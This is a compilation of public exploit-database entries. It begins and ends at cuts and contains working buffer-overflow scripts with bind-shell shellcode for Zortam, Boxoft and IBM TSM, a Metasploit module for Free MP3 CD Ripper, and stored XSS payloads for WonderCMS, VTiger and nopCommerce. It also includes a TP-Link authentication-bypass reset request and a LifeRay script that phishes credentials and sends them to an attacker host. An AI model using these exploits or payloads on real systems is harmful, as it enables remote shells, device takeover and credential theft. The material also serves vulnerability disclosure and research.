shellcode += b"\x46\x48\x74\x38\x45\x51\x69\x7a\x4c\x4b\x31"
shellcode += b"\x5a\x67\x68\x6e\x6b\x42\x7a\x51\x30\x46\x61"
shellcode += b"\x6a\x4b\x68\x63\x36\x54\x47\x39\x6c\x4b\x35"
shellcode += b"\x64\x6c\x4b\x67\x71\x5a\x4e\x74\x71\x6b\x4f"
shellcode += b"\x64\x71\x6f\x30\x59\x6c\x6c\x6c\x6f\x74\x39"
shellcode += b"\x50\x50\x74\x43\x37\x49\x51\x58\x4f\x34\x4d"
shellcode += b"\x77\x71\x6f\x37\x5a\x4b\x6c\x34\x35\x6b\x53"
shellcode += b"\x4c\x35\x74\x35\x78\x73\x45\x48\x61\x6c\x4b"
shellcode += b"\x42\x7a\x75\x74\x66\x61\x5a\x4b\x50\x66\x4c"
shellcode += b"\x4b\x46\x6c\x70\x4b\x4e\x6b\x31\x4a\x77\x6c"
shellcode += b"\x76\x61\x68\x6b\x4e\x6b\x53\x34\x6c\x4b\x53"
shellcode += b"\x31\x4a\x48\x4e\x69\x37\x34\x56\x44\x65\x4c"
shellcode += b"\x70\x61\x38\x43\x4f\x42\x45\x58\x61\x39\x38"
shellcode += b"\x54\x6f\x79\x48\x65\x4f\x79\x59\x52\x43\x58"
shellcode += b"\x4c\x4e\x32\x6e\x36\x6e\x7a\x4c\x72\x72\x49"
shellcode += b"\x78\x4f\x6f\x4b\x4f\x6b\x4f\x6b\x4f\x4e\x69"
shellcode += b"\x42\x65\x54\x44\x6f\x4b\x73\x4e\x68\x58\x4b"
shellcode += b"\x52\x44\x33\x6c\x47\x75\x4c\x37\x54\x42\x72"
shellcode += b"\x4d\x38\x6e\x6e\x69\x6f\x59\x6f\x49\x6f\x6d"
shellcode += b"\x59\x57\x35\x73\x38\x70\x68\x32\x4c\x52\x4c"
shellcode += b"\x67\x50\x71\x51\x75\x38\x65\x63\x76\x52\x76"
shellcode += b"\x4e\x42\x44\x61\x78\x34\x35\x54\x33\x71\x75"
shellcode += b"\x73\x42\x70\x30\x79\x4b\x6b\x38\x61\x4c\x31"
shellcode += b"\x34\x57\x7a\x4c\x49\x59\x76\x31\x46\x69\x6f"
shellcode += b"\x33\x65\x67\x74\x4f\x79\x6a\x62\x32\x70\x6d"
shellcode += b"\x6b\x4d\x78\x6f\x52\x42\x6d\x4f\x4c\x6f\x77"
shellcode += b"\x55\x4c\x75\x74\x53\x62\x79\x78\x61\x4f\x79"
shellcode += b"\x6f\x6b\x4f\x79\x6f\x30\x68\x42\x4f\x62\x58"
shellcode += b"\x63\x68\x77\x50\x73\x58\x70\x61\x30\x67\x33"
shellcode += b"\x55\x50\x42\x43\x58\x32\x6d\x70\x65\x61\x63"
shellcode += b"\x32\x53\x76\x51\x69\x4b\x6d\x58\x33\x6c\x51"
shellcode += b"\x34\x35\x5a\x4b\x39\x6b\x53\x72\x48\x70\x58"
shellcode += b"\x47\x50\x55\x70\x57\x50\x42\x48\x62\x50\x63"
shellcode += b"\x47\x70\x6e\x35\x34\x34\x71\x6f\x39\x4c\x48"
shellcode += b"\x30\x4c\x74\x64\x67\x74\x6e\x69\x4b\x51\x54"
shellcode += b"\x71\x58\x52\x62\x72\x36\x33\x62\x71\x71\x42"
shellcode += b"\x79\x6f\x68\x50\x74\x71\x79\x50\x76\x30\x69"
shellcode += b"\x6f\x50\x55\x54\x48\x41\x41"
buff = ""
buff += "A" * eip_offset
buff += struct.pack("<I",0x02c73d7b) # 0x02803d7b cause char modification needs to be written as 0x02c73d7b
buff += shellcode
buff += "C" * (buff_max_length - len(buff))
print("Writing {} bytes".format(len(buff)))
f = open("IBM_TSM_v.5.2.0.1_exploit.txt", "w")
f.write(buff)
f.close()
# Exploit Title: WonderCMS 3.1.3 - 'content' Persistent Cross-Site Scripting
# Date: 20-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.wondercms.com/
# Version: 3.1.3
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29233
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Reflected XSS involves the reflecting of a malicious script off of a web application, onto a user's browser.
Attack vector:
This vulnerability can results attacker to inject the XSS payload in Page description and each time any user will visits the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Page description.
Steps-To-Reproduce:
1. Go to the Simple website builder.
2. Put this payload in Page description: "hemantsolo"><img src=x onerror=confirm(1)>"
3. Now go to the website and the XSS will be triggered.
POST /demo/ HTTP/1.1
Host: 127.0.0.1
Connection: close
Content-Length: 196
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Origin: 127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: 127.0.0.1/demo/
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7,ru;q=0.6
Cookie: PHPSESSID=da4eae35135fd9ce3c413b936e2e5925
fieldname=description&token=c526c8235770f7efe7b7868a806f51f9a48545e117e00534e5cd82fde1bf1064&content=HemantSoloHacker%22%3E%3Cimg%20src%3Dx%20onerror%3Dconfirm(1)%3E&target=pages&menu=&visibility=
# Exploit Title: Zortam Mp3 Media Studio 27.60 - Remote Code Execution (SEH)
# Date: November 19, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: https://www.zortam.com/index.html
# Software Link: https://www.zortam.com/download.html
# Version: 27.60
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Professional Build 19041
# Steps to reproduce crash:
# 1) Run provided Perl code Zortam_MP3_Studio_poc.pl
# 2) Open Zortam_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Zortam Mp3 Studio
# 5) From the Menu bar -> File -> New Library
# 6) Click ‘OK’ when prompted ‘Do you want to create a new Mp3 library?’
# 7) Paste the contents of Zortam_Crash.txt into the ‘Select Folder’ field
# 8) Click 'OK'
# 9) Connect to victim machine on port 80
#!/usr/bin/perl
$baddata = "Metal's_Greatest_Hits"; # you can put whatever you need to here to convince victim (will be seen during crash)
$baddata .= "\x90" x (268-length($baddata)); # exact overwrite at 272
$nseh = "\xeb\x0b\x90\x90"; # nseh overwrite JMP short 11 bytes into NOP sled
# 0x10015962 : pop ecx # pop esi # ret | ascii {PAGE_EXECUTE_READ} [WNASPI32.DLL] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.0.1.50
# (C:\Program Files\Zortam Mp3 Media Studio\WNASPI32.DLL)
$seh = "\x62\x59\x01\x10"; # seh overwrite
$nop = "\x90" x 12; # NOP sled
# msfvenom -p windows/shell_bind_tcp LPORT=80 -b "\x00\x0a\x0d" -f perl -v payload EXITFUNC=seh
# Payload size: 355 bytes
$payload =
"\xd9\xcf\xbf\xad\x91\xa4\xe3\xd9\x74\x24\xf4\x5a\x29\xc9" .
"\xb1\x53\x83\xc2\x04\x31\x7a\x13\x03\xd7\x82\x46\x16\xdb" .
"\x4d\x04\xd9\x23\x8e\x69\x53\xc6\xbf\xa9\x07\x83\x90\x19" .
"\x43\xc1\x1c\xd1\x01\xf1\x97\x97\x8d\xf6\x10\x1d\xe8\x39" .
"\xa0\x0e\xc8\x58\x22\x4d\x1d\xba\x1b\x9e\x50\xbb\x5c\xc3" .
"\x99\xe9\x35\x8f\x0c\x1d\x31\xc5\x8c\x96\x09\xcb\x94\x4b" .
"\xd9\xea\xb5\xda\x51\xb5\x15\xdd\xb6\xcd\x1f\xc5\xdb\xe8" .
"\xd6\x7e\x2f\x86\xe8\x56\x61\x67\x46\x97\x4d\x9a\x96\xd0" .
"\x6a\x45\xed\x28\x89\xf8\xf6\xef\xf3\x26\x72\xeb\x54\xac" .
"\x24\xd7\x65\x61\xb2\x9c\x6a\xce\xb0\xfa\x6e\xd1\x15\x71" .
"\x8a\x5a\x98\x55\x1a\x18\xbf\x71\x46\xfa\xde\x20\x22\xad" .
"\xdf\x32\x8d\x12\x7a\x39\x20\x46\xf7\x60\x2d\xab\x3a\x9a" .
"\xad\xa3\x4d\xe9\x9f\x6c\xe6\x65\xac\xe5\x20\x72\xd3\xdf" .
"\x95\xec\x2a\xe0\xe5\x25\xe9\xb4\xb5\x5d\xd8\xb4\x5d\x9d" .
"\xe5\x60\xcb\x95\x40\xdb\xee\x58\x32\x8b\xae\xf2\xdb\xc1" .
"\x20\x2d\xfb\xe9\xea\x46\x94\x17\x15\x68\x35\x91\xf3\x02" .
"\xa5\xf7\xac\xba\x07\x2c\x65\x5d\x77\x06\xdd\xc9\x30\x40" .
"\xda\xf6\xc0\x46\x4c\x60\x4b\x85\x48\x91\x4c\x80\xf8\xc6" .
"\xdb\x5e\x69\xa5\x7a\x5e\xa0\x5d\x1e\xcd\x2f\x9d\x69\xee" .
"\xe7\xca\x3e\xc0\xf1\x9e\xd2\x7b\xa8\xbc\x2e\x1d\x93\x04" .
"\xf5\xde\x1a\x85\x78\x5a\x39\x95\x44\x63\x05\xc1\x18\x32" .
"\xd3\xbf\xde\xec\x95\x69\x89\x43\x7c\xfd\x4c\xa8\xbf\x7b" .
"\x51\xe5\x49\x63\xe0\x50\x0c\x9c\xcd\x34\x98\xe5\x33\xa5" .
"\x67\x3c\xf0\xdb\x96\x8c\xed\x4c\x01\x65\x4c\x11\xb2\x50" .
"\x93\x2c\x31\x50\x6c\xcb\x29\x11\x69\x97\xed\xca\x03\x88" .
"\x9b\xec\xb0\xa9\x89";
$file = "Zortam_Crash.txt";
open (FILE, '>Zortam_Crash.txt');
print FILE $baddata;
print FILE $nseh;
print FILE $seh;
print FILE $nop;
print FILE $payload;
close (FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info={})
super(update_info(info,
'Name' => "Free MP3 CD Ripper 2.6 < 2.8 (.wma.wav.flac.m3u.acc) Buffer Overflow",
'Description' => %q{
This module exploits a buffer overflow in Free MP3 CD Ripper versions 2.6 and 2.8.
By constructing a specially crafted WMA WAV M3U ACC FLAC file and attempting to convert it to an MP3 file in the
application, a buffer is overwritten, which allows for running shellcode.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gionathan Reale', # Exploit-DB POC
'ZwX' # Metasploit Module
],
'References' =>
[
[ 'CVE', '2019-9767' ],
[ 'EDB', '45412' ],
[ 'URL', 'https://www.exploit-db.com/exploits/45412' ]
],
'Platform' => 'win',
'Targets' =>
[
[
'Windows 7 x86 - Windows 7 x64',
{
'Ret' => 0x66e42121 # POP POP RET
}
]
],
'Payload' =>
{
'BadChars' => "\x00\x0a\x0d\x2f"
},
'Privileged' => false,
'DisclosureDate' => "Sep 09 2018",
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [true, 'Create malicious file example extension (.wma .wav .acc .flac .m3u)', 'name.wma'])
])
end
def exploit
file_payload = payload.encoded
msfsploit = make_fast_nops(4116)
msfsploit << "\xeb\x06#{Rex::Text.rand_text_alpha(2, payload_badchars)}" # NSEH_JMP
msfsploit << [target.ret].pack("V*") # SEH
msfsploit << file_payload
msfsploit << make_fast_nops(4440)
file_create(msfsploit)
end
end
# Exploit Title: Boxoft Convert Master 1.3.0 - 'wav' SEH Local Exploit
# Date: 17.09.2020
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/convert-master/setup(boxoft-conver=t-master).exe
# Exploit Author: Achilles
# Tested Version: 1.3.0
# Tested on: Windows 7 x64
# 1.- Run python code :Boxoft_Convert_Master.py
# 2.- Open Boxoft_Convert_Master.exe
# 3.- Click try and Batch Convert Mode
# 4.- Add Evil.wav
# 5.- And you will have a bind shell port 4444
# 6.- Greetings go:XiDreamzzXi,Metatron
#!/usr/bin/env python
import struct
buffer = "\x41" * 4132
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x6d00c683) #CDRip122.dll
nops = "\x90" * 20
#Bind=shellcode port 4444
shellcode = ("\xda\xd5\xb8\x9b\x69\x4d\xa1\xd9\x74\x24\xf4\x5a\x33"
"\xc9\xb1\x60\x83\xc2\x04\x31\x42\x15\x03\x42\x15\x79"
"\x9c\xf2\x9b\x0c\xb0\x35\x05\x03\x97\x32\x91\x2f\x75"
"\x92\x10\x7e\xdf\xd5\xdf\x95\x63\xd0\x24\x96\x1e\xca"
"\xc6\x57\x4b\xd9\xe7\x3c\xe4\x1c\xa0\xd9\x7e\x72\xe4"
"\x38\x26\xd1\x92\x88\x79\x63\x55\xe3\x94\xfe\x9a\xac"
"\xb5\xde\xe4\x35\xbc\xd0\x9f\xe6\x92\x63\x51\x5a\xaf"
"\xad\x1b\xb0\xf9\x6e\x46\xac\x68\xa9\x48\xce\xb8\xe1"
"\xd2\xf5\x1a\x7d\x84\xde\xb9\x55\xa0\xe8\xe3\xd8\xb2"
"\x31\xfb\x1a\x0b\xea\xed\xf4\x8f\xdd\xf5\x55\xbf\x1a"
"\xa5\xe8\xd8\xfa\xde\x45\x11\x7c\x4d\xea\x87\x0f\x9f"
"\xe5\xdf\x90\x18\x7e\x52\x1b\xd7\x24\x22\xab\x1b\xda"
"\x31\xa2\x75\x8f\xa3\x13\x99\x20\x5e\x07\x57\x68\x3e"
"\x10\xc7\xc2\xb0\x2b\xa0\x13\xd6\x6a\x3e\xc3\x1e\x99"
"\x4f\xf0\xce\x63\x50\xe3\x90\x80\x3e\x0e\x9c\x39\x7e"
"\x48\xe6\xf0\xe7\x3b\xd3\x7d\xe3\xa3\x62\x41\xee\x19"
"\xd0\xa8\xc9\xdb\x02\x93\x0f\x34\xb0\xad\x81\x08\x57"
"\xce\xb8\x38\xfe\x13\xc9\xe7\x40\xc2\x17\xa6\x3a\x4c"
"\x06\x31\xfc\x3f\x8f\xcb\x85\x84\x74\x98\x9c\x63\xe5"
"\x46\x2f\xfc\x15\x3b\x5c\x37\xd3\x36\xfc\x39\x3c\x86"
"\x29\x32\xbb\xb3\x04\x13\x6a\xd1\xa7\x55\xac\x8e\xa8"
"\x05\xaf\xc3\xae\x9d\xc6\x5f\xa8\x9d\x8e\x4a\x25\x3a"
"\x35\xa3\xd7\x4c\xaa\xb1\x87\xca\x54\x6d\xdc\xb2\xf3"
"\x3a\xaa\x29\xea\x44\x01\x4e\xb0\x08\x9a\xd0\xb5\x69"
"\x42\xe5\xb4\x5f\x59\xff\xb4\x90\xe2\x97\x66\x09\x89"
"\x87\x8e\xff\xa8\x21\x68\x3f\x01\xe9\xb3\x27\x63\xd2"
"\x93\x2f\x4d\x9c\x28\x21\xd4\x9d\xad\x8f\x24\x19\xc9"
"\x98\xbc\x24\x0b\x47\x84\x9c\x57\xd2\x20\x79\x71\x67"
"\xe0\xd1\xcd\x40\x51\x7d\xe2\x39\xa9\xd2\x92\x4c\x24"
"\x59\x7b\xfd\x89\x6e\xea\xec\xc8\xac\x54\x8a\x26\x60"
"\x81\x38\x06\x32\xab\x56\x1c\xe7\xd0\x78\xe5\xa2\x75"
"\xc8\x28\x1b\xd5\x3f\x51")
payload = buffer + nseh + seh + nops + shellcode
try:
f=open("Evil.wav","w")
print "[+] Creating %s bytes evil payload.." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
# Exploit Title: LifeRay 7.2.1 GA2 - Stored XSS
# Date: 10/05/2020
# Exploit Author: 3ndG4me
# Vendor Homepage: https://www.liferay.com/
# Software Link: https://www.liferay.com/
# Version: 7.1.0 -> 7.2.1 GA2 (REQUIRED)
# Tested on: Debian Linux
# CVE : CVE-2020-7934
# Public Exploit/Whitepaper: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
# NOTE: The attached proof of concept is a javascript payload,
submitted as a ".txt" file to attach via email as ".js" is often
blocked.
// CVE-2020-7934 Cred Phishing Example Attack
// Author: 3ndG4me
// Github: https://github.com/3ndG4me/liferay-xss-7.2.1GA2-poc-report-CVE-2020-7934
// Host this payload with your site and paste in this script tag into a vulnerable field with your URL replaced where relevant:
// <SCRIPT SRC="//attacker.site/cve-2020-7934.js">
var email = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your email:", "");
var password = prompt("To process this search we need you to confirm your credentials.\n\nPlease confirm your password:", "");
console.log(email);
console.log(password);
var url = "http://attacker.site/" + email + ":" + password;
$.get(url);
# Exploit Title: Boxoft Audio Converter 2.3.0 - '.wav' Buffer Overflow (SEH)
# Discovery by: Luis Martinez
# Discovery Date: 2020-11-22
# Vendor Homepage: http://www.boxoft.com/
# Software Link: http://www.boxoft.com/audio-converter/a-pdf-bac.exe
# Tested Version: 2.3.0
# Vulnerability Type: Local Buffer Overflow (SEH)
# Tested on OS: Windows 10 Pro (10.0.18362) x64 en
# Steps to Produce the Local Buffer Overflow (SEH):
# 1.- Run python code: Boxotf_Audio_Converter_2.3.0.py
# 2.- Open AudioConvert.exe
# 3.- Try
# 4.- Batch Convert Mode -> Next
# 5.- Add
# 6.- Select Boxotf_Audio_Converter_2.3.0.wav -> Open
# 7.- Port 4444 open
#!/usr/bin/env python
#-*-coding: utf-8-*-
#msfvenom -p windows/shell_bind_tcp -b '\x00\x0A\x0D' -f c
shellcode = ("\xbb\x80\x84\x2c\xbc\xda\xce\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
"\x53\x31\x5e\x12\x83\xc6\x04\x03\xde\x8a\xce\x49\x22\x7a\x8c"
"\xb2\xda\x7b\xf1\x3b\x3f\x4a\x31\x5f\x34\xfd\x81\x2b\x18\xf2"
"\x6a\x79\x88\x81\x1f\x56\xbf\x22\x95\x80\x8e\xb3\x86\xf1\x91"
"\x37\xd5\x25\x71\x09\x16\x38\x70\x4e\x4b\xb1\x20\x07\x07\x64"
"\xd4\x2c\x5d\xb5\x5f\x7e\x73\xbd\xbc\x37\x72\xec\x13\x43\x2d"
"\x2e\x92\x80\x45\x67\x8c\xc5\x60\x31\x27\x3d\x1e\xc0\xe1\x0f"
"\xdf\x6f\xcc\xbf\x12\x71\x09\x07\xcd\x04\x63\x7b\x70\x1f\xb0"
"\x01\xae\xaa\x22\xa1\x25\x0c\x8e\x53\xe9\xcb\x45\x5f\x46\x9f"
"\x01\x7c\x59\x4c\x3a\x78\xd2\x73\xec\x08\xa0\x57\x28\x50\x72"
"\xf9\x69\x3c\xd5\x06\x69\x9f\x8a\xa2\xe2\x32\xde\xde\xa9\x5a"
"\x13\xd3\x51\x9b\x3b\x64\x22\xa9\xe4\xde\xac\x81\x6d\xf9\x2b"
"\xe5\x47\xbd\xa3\x18\x68\xbe\xea\xde\x3c\xee\x84\xf7\x3c\x65"
"\x54\xf7\xe8\x10\x5c\x5e\x43\x07\xa1\x20\x33\x87\x09\xc9\x59"
"\x08\x76\xe9\x61\xc2\x1f\x82\x9f\xed\x0e\x0f\x29\x0b\x5a\xbf"
"\x7f\x83\xf2\x7d\xa4\x1c\x65\x7d\x8e\x34\x01\x36\xd8\x83\x2e"
"\xc7\xce\xa3\xb8\x4c\x1d\x70\xd9\x52\x08\xd0\x8e\xc5\xc6\xb1"
"\xfd\x74\xd6\x9b\x95\x15\x45\x40\x65\x53\x76\xdf\x32\x34\x48"
"\x16\xd6\xa8\xf3\x80\xc4\x30\x65\xea\x4c\xef\x56\xf5\x4d\x62"
"\xe2\xd1\x5d\xba\xeb\x5d\x09\x12\xba\x0b\xe7\xd4\x14\xfa\x51"
"\x8f\xcb\x54\x35\x56\x20\x67\x43\x57\x6d\x11\xab\xe6\xd8\x64"
"\xd4\xc7\x8c\x60\xad\x35\x2d\x8e\x64\xfe\x5d\xc5\x24\x57\xf6"
"\x80\xbd\xe5\x9b\x32\x68\x29\xa2\xb0\x98\xd2\x51\xa8\xe9\xd7"
"\x1e\x6e\x02\xaa\x0f\x1b\x24\x19\x2f\x0e")
nSEH = "\xeb\x06\x90\x90"
SEH = "\xB8\x68\x40\x00" #AudioConvert.exe
buffer = "\x41" * 4132 + nSEH + SEH + "\x90" * 16 + shellcode
f = open ("Boxotf_Audio_Converter_2.3.0.wav", "w")
f.write(buffer)
f.close()
# Exploit Title: VTiger v7.0 CRM - 'To' Persistent XSS
# Date: 2020-11-18
# Exploit Vulnerability-Lab
# Vendor Homepage: https://www.vtiger.com/open-source-crm/download-open-source/
# Software Link: https://sourceforge.net/projects/vtigercrm/files/
# Version: v7.0
Document Title:
===============
VTiger v7.0 CRM - (To) Persistent Email Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2227
Release Date:
=============
2020-11-18
Vulnerability Laboratory ID (VL-ID):
====================================
2227
Common Vulnerability Scoring System:
====================================
4.8
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Vtiger CRM is web-application built using PHP. Choose the best CRM for
your business. Custom Module & Relationship builder for
VTiger is a very useful extension that allows crm administrators to
create custom modules within few clicks. All custom modules
are created following strict VTiger standards. In addition, the
relationship builder allows crm admin to link together existing modules
as well as new custom modules.
(Copy of the Homepage:
https://www.vtiger.com/open-source-crm/download-open-source/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent
cross site vulnerability in the VTiger v7.0 CRM open-source web-application.
Affected Product(s):
====================
VTExperts
Product: VTiger v7.0 - CRM (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-04-27: Public Disclosure (Vulnerability Laboratory)
2020-04-28: Researcher Notification & Coordination (Security Researcher)
2020-04-29: Vendor Notification 1 (Security Department)
2020-05-30: Vendor Notification 2 (Security Department)
2020-06-22: Vendor Notification 3 (Security Department)
****-**-**: Vendor Response/Feedback (Security Department)
****-**-**: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the official VTiger v7.0 CRM open-source web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise
browser to web-application requests from the application-side.
The persistent cross site scripting web vulnerability is located in the
`searchValue` Parameter of the `Emails Compose` module.
Attackers are able to inject own mlicious script code in the `To` sender
input field of the email compose module to attack other
user accounts. The email can be delivered with multiple receipients
which allows an attacker to insert the target email and a
malicious payload. The request method to inject is GET via searchValue
and POST on compose with persistent attack vector.
Successful exploitation of the vulnerabilities results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
[+] GET
Vulnerable Module(s):
[+] Email Compose (index.php?module=Emails)
Vulnerable Input(s):
[+] To (Sender - Email)
Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by
remote attackers with low privileged account and with low user interaction.
For security demonstration or to reproduce the cross site web
vulnerability follow the provided information and steps below to continue.
PoC: Url
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY#
Manual steps to reproduce the vulnerability ...
1. Open the web-application ui
2. Login with a regular user role to the ui
3. Open vendors and move to compose to email form
4. Inject malicious payload as "to" sender information and as well a
valid email to target
5. Send the request after the compose
6. Wait until the administrator or higher privileged targeted users
click in the email or receives the email on preview
7. Successful reproduce of the cross site scripting web vulnerability!
PoC: Vulnerable Source (Execution Point)
<div class="col-lg-12"><div class="col-lg-2"><span
class="pull-right">To <span class="redColor">*</span></span></div>
<div class="col-lg-6"><div class="select2-container
select2-container-multi autoComplete sourceField select2"
id="s2id_emailField" style="width: 100%;"><ul class="select2-choices
ui-sortable"> <li class="select2-search-choice">
<div>IT <b>(test@test.com)</b></div> <a href="#"
class="select2-search-choice-close" tabindex="-1"></a></li>
<li class="select2-search-choice"><div><iframe src"evil.source"
onload=alert(document.cookie)></div></iframe></div>
--- PoC Session Logs [GET] ---
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=>"<iframe+src%3Da+onload%3Dalert(document.cookie)>&_=1587844428851
Host: localhost:8080
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Connection: keep-alive
Referer:
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10 (Debian)
Content-Length: 28
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
-
Content-Type: text/json; charset=UTF-8
http://localhost:8080/vtigercrm/evil.source
Host: localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
Referer:
http://localhost:8080/vtigercrm/index.php?module=Vendors&relatedModule=Emails&view=Detail&record=3883&mode=showRelatedList&relationId=62&tab_label=Emails&app=INVENTORY
Cookie: PHPSESSID=ni2357om9nni5vvhovf20rkt51
-
GET: HTTP/1.1 200 OK
Server: Apache/2.4.10
Content-Length: 299
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Reference(s):
http://localhost:8080/vtigercrm/
http://localhost:8080/vtigercrm/index.php
http://localhost:8080/vtigercrm/index.php?module=Emails&action=BasicAjax&searchValue=
Security Risk:
==============
The security risk of the persistent web vulnerability i the
web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: TP-Link TL-WA855RE V5_200415 - Device Reset Auth Bypass
# Date: 2020/07/29
# Exploit Author: malwrforensics
# Vendor Homepage: https://tp-link.com
# Software link: https://static.tp-link.com/2020/202004/20200430/TL-WA855RE_V5_200415.zip
# Version: TL-WA855RE(US)_V5_200415
# Tested on: N/A
# CVE : 2020-24363
Important: The vendor has released a fix; the new firmware (TL-WA855RE(US)_V5_200731) is available to download from: https://www.tp-link.com/us/support/download/tl-wa855re/v5/#Firmware
Details
By default the web interface of the TL-WA855RE wireless extender require users to log in in order to access the admin interface. However, an attacker, on the same network, can bypass it and use the APIs provided to reset the device to its factory settings by using the TDDP_RESET code. An attacker can then set up a new admin password, resulting in a complete takeover of the device.
To test, you can send a POST request like the one below using the TDDP_RESET (5). The request doesn't need any type of authentication. You can then access the web interface and set a new administrative password.
POST /?code=5&asyn=0 HTTP/1.1
Host: <redacted>
Content-Length: 7
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Content-Type: text/plain;charset=UTF-8
Origin: http://<redacted>
Referer: http://<redacted>
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
0|1,0,0
# Exploit Title: nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting
# Date: 24-11-2020
# Exploit Author: Hemant Patidar (HemantSolo)
# Vendor Homepage: https://www.nopcommerce.com/
# Version: 4.30
# Tested on: Windows 10/Kali Linux
# CVE: CVE-2020-29475
Stored Cross-site scripting(XSS):
Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application.
Attack vector:
This vulnerability can results attacker to inject the XSS payload in Schedule tasks and each time any user will go to that page of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload.
Vulnerable Parameters: Schedule tasks.
Steps-To-Reproduce:
1. Go to the nopCommerce Store admin page.
2. Now go to the System-Schedule tasks option.
3. Now click to on edit button on any task.
